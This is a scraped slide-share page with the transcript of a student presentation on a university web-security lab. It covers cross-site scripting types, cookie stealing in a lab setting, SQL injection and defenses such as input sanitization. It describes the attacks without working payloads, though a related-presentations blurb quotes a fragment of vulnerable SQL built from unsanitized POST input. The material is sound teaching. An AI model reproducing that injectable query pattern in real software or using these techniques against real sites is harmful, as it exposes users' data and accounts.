Presentation is loading. Please wait.

Presentation is loading. Please wait.

Group 18: Chris Hood Brett Poche

Published byAmberlynn Merritt Modified over 6 years ago

Similar presentations

Presentation on theme: "Group 18: Chris Hood Brett Poche"— Presentation transcript:

1 Group 18: Chris Hood Brett Poche
ECE 4112: Lab 9 Web Security Spring Break Edition Group 18: Chris Hood Brett Poche

2 Outline Cross Site Scripting Definition 3 Main XSS Attacks
XSS Defenses Lab Procedures Each week two lab groups will combine to do one brief power point presentation in class on the lab due date. This presentation (and leading of a class discussion) will be a brief summary of 1) the threats and techniques identified in the lab 2) the defenses one could use to protect against those threats

3 Setup Apache Server – open source HTTP web server
PHP – open source, reflective programming language used to develop server-side applications, dynamic web content, and software applications. (MediaWiki) MySQL – SQL Database Management System

4 Cross Site Scripting XSS refers to a vulnerability in web applications where an attacker can “inject code into a page in a manner such that the web page subsequently executes the code. Seen in dynamic web applications that do not properly validate and escape user input.

5 XSS Attacks Type 0: DOM-based or local
Type 1: Non-persistent or reflected Type 2: Persistent or stored

6 Type 0 Attack Utilizes JavaScript’s privileges in the “local zone” to execute code Attacks local machine via IE user privileges Example: A web page’s JavaScript is used to launch code stored on a viewer’s computer Not in lab

7 Type 1 Attack Supplied code is immediately executed by the server
Example: Inserting JavaScript directly into search query Lab Section 1

8 Type 2 Attack Inserted code is directly stored (in a database) and is later displayed without being formatted Example Inserting JavaScript code into a forum message Lab Section 1

9 Lab Section 1: Cross-Site Scripting
Section 2: SQL Injection on Linux Apache Web Server Section 3: Practical Web Exercise on Windows Server

10 Lab Section 1 Stealing cookies with Type 1 & 2 attacks
Cookie – maintain state information Harvesting user names and super secret passwords Lots of sites use cookies to store info, like user name/pass, shopping cart, tracking purposes, etc

11 Lab Example This was done by placing JavaScript code directly into the URL (type 1 XSS attack)

12 Lab Example 2 This was done by placing JavaScript directly into the forum message, so it was placed into the HTML and directly interpreted. Both of these aren’t that harmful alone, but they are a good proof of concept along the lines of what can be done and how easy/stealthy it is.

13 Lab Section 2 SQL injection via query string and login fields
Use company’s database against themselves Obtain user information directly from database Select statements inserted directly into URL (**not JavaScript anymore**) Best defense: input validation SQL

14 XSS Defenses Disable JavaScript Sanitize user input
Not feasible Sanitize user input Search input for blacklisted code Other suggestions? Online research led to similar, three results Sanitize, like look for special characters and/or replace all single quotes with double quotes, semi-colons, /* comments, and <> marks Blacklisted code includes code that contains specific SQL queries and/or javascript

15 Lab Section 3 Basic No-No’s Suggestions for other precautions?
Predictable File Locations Weak Password Recovery Information Leakage Suggestions for other precautions? dunce

16 Wrap-up Cross Site Scripting Definition 3 Main XSS Attacks
XSS Defenses Lab Procedures Questions???

Download ppt "Group 18: Chris Hood Brett Poche"

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Past, Present and Future By Eoin Keary and Jim Manico

Past, Present and Future By Eoin Keary and Jim Manico
Web Security Never, ever, trust user inputs Supankar.

Web Security Never, ever, trust user inputs Supankar.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Modern Web Application Frameworks CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Modern Web Application Frameworks CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Introducing LAMP: Linux, Apache, MySQL and PHP Track 2 Workshop PacNOG 7 July 1, 2010 Pago Pago, American Samoa.

Introducing LAMP: Linux, Apache, MySQL and PHP Track 2 Workshop PacNOG 7 July 1, 2010 Pago Pago, American Samoa.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.

1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.
Preventing SQL Injection ~example of SQL injection $user = $_POST[‘user’]; $pass = $_POST[‘pass’]; $query = DELETE FROM Users WHERE user = ‘$user’ AND.

Preventing SQL Injection ~example of SQL injection $user = $_POST[‘user’]; $pass = $_POST[‘pass’]; $query = DELETE FROM Users WHERE user = ‘$user’ AND.
Prevent Cross-Site Scripting (XSS) attack

Prevent Cross-Site Scripting (XSS) attack
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.

+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Similar presentations

Ads by Google